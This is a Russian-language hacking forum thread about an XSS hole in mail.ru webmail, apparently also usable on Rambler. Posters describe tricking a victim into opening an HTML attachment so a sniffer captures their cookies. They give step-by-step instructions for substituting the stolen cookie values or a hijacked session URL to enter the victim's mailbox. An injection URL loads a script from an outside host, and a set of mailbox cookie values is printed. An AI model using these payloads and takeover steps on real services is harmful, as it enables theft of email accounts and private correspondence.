Actu@l SpY

Попробуй ищё раз отправить. Видео не дошло.

ЭТУ XSS не прикрыли!
прост чеб она выполнилась недостаточно открыть письмо!
Отсылаеться она так: сохраняеться в html файл, после чего файл прикрепляеться к письму! потом при прочтение письма жертва должна нажать "скачать" прикрепленный файл, и в появившемся окошке нажать кнопку открыть! собсно вот так))) тогда срабатывает, и куки уплывают.......

__________________
No СПлоА - No World!
Как узнать информацию о посетителях сайта

Классно, а от браузера жертвы результат не зависит?

на мaйл.ру вопше по себе ху* знает какие у них там глиуки на сервере ,вчера вечером сниффер перестал выдёргивать сессию ,сегодня сессия и куки выдёргиваетса нормально.

когда на сниффер приходит куки и путь к ящику: http://win.mail.ru/cgi-bin/
то надо менять cookie в опере
в каждый параметр вставляете своё значение например так:
заходите к себе на емаил через оперу дальше в инструменты,настройки,куки ,управление cookies ,виде-те @майл.ру кликнете на логотип открывается табло с куками:
c8: 71gpRQAAAAD1LAEAAAAAARAQAAAAABGR0BAAAAAAD7iAEAA
Mpop:1160300756:4d50560750005024f6a5d5e465e0404090 c1d010c00184958520c44115c565c5b1b4341:xak4u@mail.r u:
Mpopl:63920967
mrcu:FDD24528E35C2CFCD118A66742
p:g20EAEr/eAA
t:bLD1AAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAABAAABAAAAAAAABgMpgcA
теперь меняете каждый параметр на то,что утянул сниффер
вход:http://win.mail.ru/cgi-bin/start

утенулась сессия то куки подменивать в Опере не нужно,на тот момент пока жертва в онлайне читает письмо вы входите так : http://win.mail.ru/session/5a0f5b647243746f19050219091d011b0007014f6a5d5e465e 0704091b02747b1f5c504350555842105b5c44411f4642/start
остальное вот это:/readmsg/document.html?id=11603102580000017668;0;1&mode=att achment&channel=&notype удаляете

если не разберётесь стучите ,всем удачи

rabotaet respekt

выше приведённый мной вариант срабатывает и на Рамблер.ру
ещё нашёл вариант : http://win.mail.ru/cgi-bin/sendmsg?plainmode=1&Body="><SCRIPT SRC=http://devarsiv.org/alex/j.js></SCRIPT>
но ругается на потенциальный опасный код в письме ,тoесть в прикреплённом хтмл файле
вот сам ксс на майле.ру :win.mail.ru/cgi-bin/sendmsg?plainmode=1&Body=<script>alert('XSS')</script>

У мя не пашет! не уверен че она работает или работала в ближайшее время)))

__________________
No СПлоА - No World!
Как узнать информацию о посетителях сайта

вчера алерт выскакивал 100% отвечаю, сегодня голяк
в паб-лик больше скидывайте баги ..короче

круто !!!!!!!! Только нужно умудрится заставить жертву скачать файл